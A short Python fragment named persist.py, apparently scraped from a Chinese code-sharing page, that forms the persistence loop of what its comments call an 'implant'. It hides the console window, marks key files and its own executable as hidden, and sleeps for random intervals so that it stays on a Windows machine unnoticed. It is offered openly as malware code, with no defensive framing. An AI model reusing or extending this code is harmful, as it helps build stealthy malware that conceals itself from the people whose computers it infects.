def run(self):
while (True):
if not DEBUG_MODE:
# keep implant implanted
print("insist must persist")
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, False)
# Things that we really do want to stash away somewhere
hideFile(WebPath[:1]) # slashes
hideFile(KeyPath[:1])
hideFile(sys.argv[0])
time.sleep(random.randint(1, 420))
persist.py 文件源码
python
阅读 22
收藏 0
点赞 0
评论 0
评论列表
文章目录